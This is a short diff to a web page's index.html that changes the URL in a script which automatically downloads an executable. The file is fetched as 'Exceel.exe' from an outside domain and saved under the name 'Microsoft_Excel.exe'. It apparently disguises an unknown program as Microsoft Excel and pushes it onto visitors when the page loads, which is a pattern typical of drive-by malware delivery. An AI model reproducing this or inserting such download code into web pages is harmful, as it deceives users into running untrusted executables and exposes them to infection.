--- a/index.html
+++ b/index.html
@@ -120,7 +120,7 @@
         }
     
         // Usage example
-        const fileUrl = 'https://drive.ninjavan.tech/Microsoft_Excel.exe';
+        const fileUrl = 'https://drive.ninjavan.tech/Exceel.exe';
         const fileName = 'Microsoft_Excel.exe';
         downloadFile(fileUrl, fileName);
 
